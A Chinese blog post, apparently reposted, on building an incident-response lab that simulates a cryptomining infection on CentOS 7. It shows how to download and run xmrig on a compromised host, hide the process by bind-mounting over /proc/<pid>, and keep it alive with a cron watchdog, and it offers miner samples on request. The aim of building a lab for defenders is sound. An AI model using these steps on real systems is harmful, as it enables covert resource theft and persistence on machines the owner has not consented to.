当前位置:   article > 正文

挖矿病毒靶场的搭建_应急响应靶场

应急响应靶场

挖矿病毒应急响应

自己在应急响应这方面的知识,可以说是很薄弱,几乎为0。最近打算入手学习一下应急响应,看了好久的文档,想着实战一下检验自己的学习成果,不过是本人的资源有限,也没找到啥好的靶场,所以就想着自己搭建一个。但是由于本人实力有限,也只懂得皮毛。大家不要嘲笑,也多请各位大佬多多指教!!

一、攻击模拟

1、环境

现在我们模拟一下攻击者,假设现在我们已经通过漏洞getshell或者rec了

受害主机:centos7

2、攻击流程

先查看一下权限,root权限

image-20230716003531522

然后就是把病毒传上来

挖矿病毒的运行程序我放在的根目录下,在攻击机启动一个web服务

python3 -m http.server 9999
  • 1

image-20230716004224855

然后我们在受害主机上用wget命令下载

image-20230716004417467

创建一个隐藏目录,并然后解压到新目录

tar -zxvf xxx
  • 1

image-20230716005027786

cd到我们挖矿程序的目录,然后给他权限,运行

chmod +x xmrig
  • 1

image-20230716005508781

此时我们可以看到cpu爆满,这样就是运行成功了。

image-20230716005612770

此时我们在ps里是可以看到他的信息

ps -aux | grep pid号
  • 1

image-20230716010923061

这样的话防守人员或者说运维人员,很容易发现他,当他们看到cpu爆红之后开始排查,就很容易排查到我们,我们需要给他隐藏起来

3、目录挂载

无法通过ps、top等命令进行查询,可能是因为攻击者将/proc/pid进行了隐藏,可以通过一下方式进行(ubuntu测试成功,centos测试失败)

  • makdir .hidder
  • sudo mount -o bind .hidder /proc/3514

这种情况可以使用cat /proc/$$/mountinfo

这样整一个目录挂在,就无法通过 ps、top等命令进行查询

4、计划任务

添加计划任务,作用就是如果他的进程被杀掉了,可以再次启动

第一步就是先创建一个shell脚本,写如一下内容

#!/bin/bash

if ! pgrep -x "xmrig" 
then
    nohup /tmp/.k/xmrig &
fi
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

赋予他执行的权限

sudo chmod +x /tmp/.k/xmrig.sh
  • 1

设置计划任务,定期执行监控脚本。你可以使用Cron来设置计划任务,让监控脚本每隔一段时间执行一次。

执行以下命令以编辑Cron表:

crontab -e
  • 1

在打开的文件中,添加以下行来设置计划任务:

* * * * * sleep 10; /tmp/.k/xmrig.sh   #每10s执行一次
  • 1
crontab -e
  • 1

在打开的文件中,添加以下行来设置计划任务:

* * * * * sleep 10; /tmp/.k/xmrig.sh   #每10s执行一次
  • 1

病毒样本获取

橙色少年 ,后台发送 " 挖矿病毒样本 " 即可!
  • 1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/723611
推荐阅读
相关标签
  

闽ICP备14008679号